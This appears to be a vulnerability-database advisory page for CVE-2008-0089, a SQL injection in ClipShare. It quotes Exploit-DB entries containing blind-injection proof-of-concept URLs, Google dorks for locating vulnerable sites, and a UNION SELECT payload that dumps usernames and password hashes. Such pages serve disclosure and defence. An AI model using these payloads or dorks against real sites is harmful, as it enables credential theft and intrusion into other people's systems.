CVE-2008-0089
Published 2008-01-04
CVE-2008-0089: SQL injection vulnerability in uprofile.php in ClipShare allows remote attackers to execute arbitrary SQL commands via the UID parameter.
Priority: P3 (40), high, 7.5 (CVSS 2.0)
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 1.01% (58.6th percentile)
No detection rules found.
Exploit-DB
ClipShare 4.1.1 - Multiples Vulnerabilities
exploitdb·2013-03-27
CVE-2008-5489 ClipShare 4.1.1 - Multiples Vulnerabilities
---
# Exploit Title: ClipShare 4.1.1 - Multiples Vulnerabilities
# Exploit Author: Esac
# Vulnerable Software: ClipShare - Video Sharing Community Script 4.1.4
# Official site: http://www.clip-share.com
# Software License: Commercial.
#all versions are vulnerable:
#Last Checked: 27 March 2013
# Note : to exploit this vulnerability MAGIC_QUOTES_GPC directive must be turned off on server side.(php.ini)
vuln file : gvideos.php , param : gid
Poc :
http://server/mavideo/gvideos.php?gid=1 [Blind]
#to exploit this poc, a group must have been added previously with some public videos
Real exploitation :
http://server/mavideo/gvideos.php?gid=1 AND 1=1
==> return normal page
http://server/mavideo/gvideos.php?gid=1 AND 1=2
==> return page with some e
Exploit-DB
ClipShare - 'UID' SQL Injection
exploitdb·2008-01-02
CVE-2008-0089 ClipShare - 'UID' SQL Injection
---
#########################################################################
video sharing www.clip-share.com Remote SQL Injection Exploit All Version
#########################################################################
AUTHOR :Krit webmaster of http://www.thaishadow.com
HOME : http://www.thaishadow.com
Download : http://www.clip-share.com/
###########################################################################
DorKs :inurl:/uprofile.php?UID=
or
"Powered by clipshare"
###########################################################################
## EXPLOIT :
http://server.com/Path/uprofile.php?UID=1+and+1=2+union+select+1,2,concat(uid,char(58),username,char(58),pwd),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+fr
http://osvdb.org/40077
http://secunia.com/advisories/28313
http://www.securityfocus.com/bid/27108
https://exchange.xforce.ibmcloud.com/vulnerabilities/39364
https://www.exploit-db.com/exploits/4830
Published: 2008-01-04